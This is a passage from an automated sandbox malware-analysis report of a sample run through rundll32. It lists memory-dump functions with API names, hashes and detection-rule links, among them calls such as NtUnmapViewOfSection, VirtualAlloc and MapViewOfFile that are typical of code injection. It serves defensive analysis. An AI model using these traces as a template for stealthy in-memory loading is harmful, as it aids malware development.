                                                                  Function 00007DF471DA7B7C Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: InformationQuerySystem_malloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 2513429149-0
                                                                  • Opcode ID: c1fb35a55db8a75f86b0acc547edd16baf9f41598112426d5c3e54fd82b3e3c3
                                                                  • Instruction ID: bb06619d9c9e1e330c255a8b4dc506df565352088ba28ec3a472accdfe72b7a1
                                                                  • Opcode Fuzzy Hash: c1fb35a55db8a75f86b0acc547edd16baf9f41598112426d5c3e54fd82b3e3c3
                                                                  • Instruction Fuzzy Hash: 0F412E3051CB488FDB58EF18D4856A677E4FBA8301F10456FE84EC7292DA34E985CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA3E3A Relevance: 1.6, APIs: 1, Instructions: 131fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00007DF471DB2FA4: NtUnmapViewOfSection.NTDLL ref: 00007DF471DB3034
                                                                    • Part of subcall function 00007DF471DB2FA4: VirtualAlloc.KERNELBASE ref: 00007DF471DB3056
                                                                    • Part of subcall function 00007DF471DB2FA4: NtSetInformationFile.NTDLL ref: 00007DF471DB3098
                                                                  • MapViewOfFile.KERNELBASE ref: 00007DF471DA3FB7
                                                                    • Part of subcall function 00007DF471DB2FA4: NtClose.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00007DF471DB30D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FileView$AllocCloseInformationSectionUnmapVirtual
                                                                  • String ID:
                                                                  • API String ID: 3911742341-0
                                                                  • Opcode ID: 502e52437849565e925d83ccf3de6c5e9e7ab8b63f1dbba070af9e040f3b2d98
                                                                  • Instruction ID: fc2dd455598afa86a638218275aea7e010be022a2f3cfe42c5f735f588f08024
                                                                  • Opcode Fuzzy Hash: 502e52437849565e925d83ccf3de6c5e9e7ab8b63f1dbba070af9e040f3b2d98
                                                                  • Instruction Fuzzy Hash: 63410D3161CA899FEB59EB28C4557AAB3B1FFD4301F14462AD49BC3182DF39F8158B81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471E3DDDC Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 1527718024-0
                                                                  • Opcode ID: bd9e178f38e0b91e4b85d738bcd5c00a0e2b0c53e8645be7d9516bb73a9f62d0
                                                                  • Instruction ID: 619559ccf8253b293b77e92c8524bdab6c7016febb88b58e3c4837844a5a803c
                                                                  • Opcode Fuzzy Hash: bd9e178f38e0b91e4b85d738bcd5c00a0e2b0c53e8645be7d9516bb73a9f62d0
                                                                  • Instruction Fuzzy Hash: 5931FA20E0CA896FE7989B2D84553B27BE5FFD5310F54417AE4CFC6282DA28F84683D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DD5B2C Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: setsockopt
                                                                  • String ID:
                                                                  • API String ID: 3981526788-0
                                                                  • Opcode ID: c3d1e43800537302380f5b1396f955236f14e3c54ea5244c42555eb7a83783ad
                                                                  • Instruction ID: 5056767ca979a8433088fbd26ca9e42ff0cc9fc15e7bf083d5db70885c8437a0
                                                                  • Opcode Fuzzy Hash: c3d1e43800537302380f5b1396f955236f14e3c54ea5244c42555eb7a83783ad
                                                                  • Instruction Fuzzy Hash: 62313D70A08A459FEB98DF1CC488B6177F1FF54325F5402AAD89ACB2D6D734A881CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DAD454 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _calloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 1170608187-0
                                                                  • Opcode ID: 6791125b6041b40252ec0e29d125b26a70b6bb3ad06553c4cc4837f4d2123a91
                                                                  • Instruction ID: f698a28bd7064f5fa053e1fcc5abfb1fd4dacc05fe52a8be557d727d57414947
                                                                  • Opcode Fuzzy Hash: 6791125b6041b40252ec0e29d125b26a70b6bb3ad06553c4cc4837f4d2123a91
                                                                  • Instruction Fuzzy Hash: A8219031618E0C8FDB58EF1CD88C7A177E1EBA831170442ABD80ACB265DA65ED85CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DAB760 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: 844d00f62b8cf5e70495a8abac675de53b76fbb5ce2c42a1bf6d18f5a51ba4cf
                                                                  • Instruction ID: 86344a94d9878d9ad55988b0477b9f54bbc5d7a01c4c9ad66b43185a17f0cd7c
                                                                  • Opcode Fuzzy Hash: 844d00f62b8cf5e70495a8abac675de53b76fbb5ce2c42a1bf6d18f5a51ba4cf
                                                                  • Instruction Fuzzy Hash: 0C119630A1CE496FEF64DB38888476236A0EFC4320F540237D85BC21D1DA68ED86CA80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA20C0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _calloc_dbg.MSVCRT(?,?,?,?,?,?,-00000001,?,00000000,00007DF471DA3945), ref: 00007DF471DA20E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _calloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 1170608187-0
                                                                  • Opcode ID: c51590aacd85f655efd91063ad02dae0314de1845b802f39fd2b5bf8436abf74
                                                                  • Instruction ID: 476c24791ca5d07647001bb6acaea18cbee8fe07d4289a9fdf7c0ada39a82892
                                                                  • Opcode Fuzzy Hash: c51590aacd85f655efd91063ad02dae0314de1845b802f39fd2b5bf8436abf74
                                                                  • Instruction Fuzzy Hash: 01018C31619E4C9FE754EF29E8C47A237E1EBA8311701026BD809C726ADE38E944CBD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0000017ED6FD4EB0 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411208409.0000017ED6FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017ED6FD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_17ed6fd0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: f6e73972739c194d795b157926e15302b96fde7321bde8de7d486285f80fee4f
                                                                  • Instruction ID: 54717c2a88f7ba6f2ff7c5f5b67d3677f94d8b54a83f648873a90660370ae244
                                                                  • Opcode Fuzzy Hash: f6e73972739c194d795b157926e15302b96fde7321bde8de7d486285f80fee4f
                                                                  • Instruction Fuzzy Hash: 4B018F32A08E195BEB64AF68D8483E577E1FB58395F050176A80DC3281DB34ECA0CFC0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA6E1C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000001,00007DF471DA7EC3), ref: 00007DF471DA6E63
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: 8daca81c3d0f5f89cf6fe5a3ed5ac884db543bf125681da9b4c854e5f3ab5189
                                                                  • Instruction ID: 8a20ae1b64e292780f291c258ec5f85cf0d4f6166145d794788cd0e512b3b64c
                                                                  • Opcode Fuzzy Hash: 8daca81c3d0f5f89cf6fe5a3ed5ac884db543bf125681da9b4c854e5f3ab5189
                                                                  • Instruction Fuzzy Hash: D001B63064884D9FDF94EF58C4C8F6573E1EBA9314B1845BAD40ECB256DA25EC86CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471D91AAC Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyHeap
                                                                  • String ID:
                                                                  • API String ID: 2435110975-0
                                                                  • Opcode ID: 6bee0d47c2223d56f047f492df5b049f4a47428231dacf7fdd2a0f68541b21f6
                                                                  • Instruction ID: 10b251b92d8a3885c9ecf243d8937ccedb6ced0b843d5f4cddc82f7079b5a2bf
                                                                  • Opcode Fuzzy Hash: 6bee0d47c2223d56f047f492df5b049f4a47428231dacf7fdd2a0f68541b21f6
                                                                  • Instruction Fuzzy Hash: 19013170B0C584AFF754EF69ACC566532B2FB8E764B44007BD08AD7164D53C78408B96
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471D91A58 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHeap
                                                                  • String ID:
                                                                  • API String ID: 10892065-0
                                                                  • Opcode ID: b4ad1c0d008e997b21b3bc8a6b3226dd8f46068eaaf9a4adb11886a91f20d782
                                                                  • Instruction ID: cef46983a3ccc22cb27f006c8ba9f8688599fc7f13ee06318c65b76207d9fbf5
                                                                  • Opcode Fuzzy Hash: b4ad1c0d008e997b21b3bc8a6b3226dd8f46068eaaf9a4adb11886a91f20d782
                                                                  • Instruction Fuzzy Hash: 30F03061B0C5895EF710AF795C8532762B2EBC9331F654A3BD58BC6181D93DBCC28A81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471D92438 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FunctionTable
                                                                  • String ID:
                                                                  • API String ID: 1252446317-0
                                                                  • Opcode ID: da1bb901ed9c28df9a08ea54ec9af0cff9c0e4c1eb0d809aed45ddb1847367b8
                                                                  • Instruction ID: bf29a3c2f2209cbea53ad61c78c3979e61c8dd1475528d5b27f21842e920d889
                                                                  • Opcode Fuzzy Hash: da1bb901ed9c28df9a08ea54ec9af0cff9c0e4c1eb0d809aed45ddb1847367b8
                                                                  • Instruction Fuzzy Hash: 62E04F30514D055BEB68E72DC84979137E0EB9C319F50426DD409C5191DB39A8DBCF82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DB389C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _malloc_dbg
                                                                  • String ID:
                                                                  • API String ID: 1527718024-0
                                                                  • Opcode ID: ba10474536fbb38330a4b47089a3fce4b8d26237f951e2caf266900230737eed
                                                                  • Instruction ID: eb95341ac0a1179ffb358b465112f6fb9ed104bf8a5a8ee4c5c0d338d62ead83
                                                                  • Opcode Fuzzy Hash: ba10474536fbb38330a4b47089a3fce4b8d26237f951e2caf266900230737eed
                                                                  • Instruction Fuzzy Hash: 92D05E10B19D0D2FAB98A67E1C9926621D5E7D81227440537A849C2250EC59DC864291
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471E01C6C Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: InfoSystem
                                                                  • String ID:
                                                                  • API String ID: 31276548-0
                                                                  • Opcode ID: bccd8a624eb6b28d8ce315b06ee3766c31c6b0b7e90251d88198d832bd84872c
                                                                  • Instruction ID: 0544ff1ea4e4ece74552a9ab79da72ea9c220fedcac9523008e7a94058aeff86
                                                                  • Opcode Fuzzy Hash: bccd8a624eb6b28d8ce315b06ee3766c31c6b0b7e90251d88198d832bd84872c
                                                                  • Instruction Fuzzy Hash: 73E04835E144485AF34DF731EC995D73361FBD4301B80416AD84B910E6ED2C628ACAC1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471D92BE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: 2b6ebd628b6762cacce5267312cbc1474e2efd12aa7b3ce2d7e01679878ed3e9
                                                                  • Instruction ID: 7becba53543811dddf553022ab940f195e0806d18bcd248b5b31a49590c3af10
                                                                  • Opcode Fuzzy Hash: 2b6ebd628b6762cacce5267312cbc1474e2efd12aa7b3ce2d7e01679878ed3e9
                                                                  • Instruction Fuzzy Hash: ACB0122492FD6B16ED4C37760C9A15534A0EF48315FC40054D80AC0044F60CD5D467C2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007DF471DA2B50 Relevance: 1.3, APIs: 1, Instructions: 37stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.411844112.00007DF471D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007DF471D90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7df471d90000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 1586166983-0
                                                                  • Opcode ID: 4a93cf2f88255c0bb6d24dd12e50ceba59c46d297b66380d94f1b892c0c9261f
                                                                  • Instruction ID: c2763dfa0cde626b17021d76372aa932cb9c2e8318a7c629b2ac855648fcfd2f
                                                                  • Opcode Fuzzy Hash: 4a93cf2f88255c0bb6d24dd12e50ceba59c46d297b66380d94f1b892c0c9261f
                                                                  • Instruction Fuzzy Hash: C5F082313185096BFB74DF2AAC847BA32A9EBC4341B148727E40BC5168FF6CED049B84
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 00007FFA06EE91A8 Relevance: .0, Instructions: 5COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.412032786.00007FFA06EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFA06EE0000, based on PE: true
                                                                  • Associated: 00000004.00000002.412032786.00007FFA06EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffa06ee0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e42a199dd2a144794a01acdf6fe42782f423dbce4d7b57bfb58323254c4f5d0
                                                                  • Instruction ID: a0ca897710d288043a04b731b1c10a4bdaa06b71089ae58bd35f11b5706b8240
                                                                  • Opcode Fuzzy Hash: 7e42a199dd2a144794a01acdf6fe42782f423dbce4d7b57bfb58323254c4f5d0
                                                                  • Instruction Fuzzy Hash: 4CB01183A8F3C02FCB830F380C3020C3FB000E38003AE808BC2C08A3A3E00C0888A322
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007FFA06EE2490 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.412032786.00007FFA06EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFA06EE0000, based on PE: true
                                                                  • Associated: 00000004.00000002.412032786.00007FFA06EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffa06ee0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                  • String ID:
                                                                  • API String ID: 4099253644-0
                                                                  • Opcode ID: 421b0cdaae37f283c5142f08e983b28161b7ce9d792ccf94b670e3cb63b740e4
                                                                  • Instruction ID: 85cfe549b79f85e31d169af332f36162bddda11979042f2a565c640f9cf19d63
                                                                  • Opcode Fuzzy Hash: 421b0cdaae37f283c5142f08e983b28161b7ce9d792ccf94b670e3cb63b740e4
                                                                  • Instruction Fuzzy Hash: 1E312721E09B4B95FA049B71FD7437823A4AF97B5CF08E235C92D0B7A6DF2CE4488201
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007FFA06EE2788 Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.412032786.00007FFA06EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFA06EE0000, based on PE: true
                                                                  • Associated: 00000004.00000002.412032786.00007FFA06EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffa06ee0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$Decode$Encode$ExitProcess_amsg_exit_lock_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 3564733578-0
                                                                  • Opcode ID: 79d241d34ee170979285545cd225ac23a63ff58082c6a3b21ddce0d47cfd0456
                                                                  • Instruction ID: de355cbbcb89d0ec5d429290a0584415b212672b8aca8f21547ed5a6bf96f191
                                                                  • Opcode Fuzzy Hash: 79d241d34ee170979285545cd225ac23a63ff58082c6a3b21ddce0d47cfd0456
                                                                  • Instruction Fuzzy Hash: 28419231A09B4285FA549F31F86017972A8BF9A79CF44E034DA4E47BA6EF3CE559C304
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007FFA06EE7CCC Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00007FFA7FFA06EE7CCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t15;
				void* _t29;

				_t15 = _t29;
				 *((long long*)(_t15 + 8)) = __rbx;
				 *((long long*)(_t15 + 0x10)) = __rbp;
				 *((long long*)(_t15 + 0x18)) = __rsi;
				 *((long long*)(_t15 + 0x20)) = __rdi;
				r14d = 0;
				if (__rdx == 0) goto 0x6ee7d09;
				if (__r8 == 0) goto 0x6ee7d09;
				if ( *__rdx != r14b) goto 0x6ee7d26;
				if (__rcx == 0) goto 0x6ee7d09;
				 *__rcx = r14w;
				return 0;
			}





                                                                  0x7ffa06ee7ccc
                                                                  0x7ffa06ee7ccf
                                                                  0x7ffa06ee7cd3
                                                                  0x7ffa06ee7cd7
                                                                  0x7ffa06ee7cdb
                                                                  0x7ffa06ee7ce5
                                                                  0x7ffa06ee7cf4
                                                                  0x7ffa06ee7cf9
                                                                  0x7ffa06ee7cfe
                                                                  0x7ffa06ee7d03
                                                                  0x7ffa06ee7d05
                                                                  0x7ffa06ee7d25

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.412032786.00007FFA06EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFA06EE0000, based on PE: true
                                                                  • Associated: 00000004.00000002.412032786.00007FFA06EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffa06ee0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 2998201375-0
                                                                  • Opcode ID: 353797659e26fed881614642063720dd60df11bace4fd7f11ad60cb3b67e2dfc
                                                                  • Instruction ID: da4ee741be6a60873b0578322353ced25ecba1a30c64897b26e2744cd00611cb
                                                                  • Opcode Fuzzy Hash: 353797659e26fed881614642063720dd60df11bace4fd7f11ad60cb3b67e2dfc
                                                                  • Instruction Fuzzy Hash: 1441C535A0878286EB608F25F5506797BA1FB87B88F14A135DB8D47B99DF3CD841CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00007FFA06EE2434 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.412032786.00007FFA06EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FFA06EE0000, based on PE: true
                                                                  • Associated: 00000004.00000002.412032786.00007FFA06EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffa06ee0000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 1646373207-1276376045
                                                                  • Opcode ID: e469042343b4f988f8384e009d588546d887df2dd5d4bc75bc1b7f542939661b
                                                                  • Instruction ID: e8ff6add6cc2a469487e58be2189d4efee399180a61487bc2349acb2fd312b01
                                                                  • Opcode Fuzzy Hash: e469042343b4f988f8384e009d588546d887df2dd5d4bc75bc1b7f542939661b
                                                                  • Instruction Fuzzy Hash: FBE04F61B1870381EF145B70B8A01B923A1AF89748F88B03AD65F4A369DE3CD68EC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%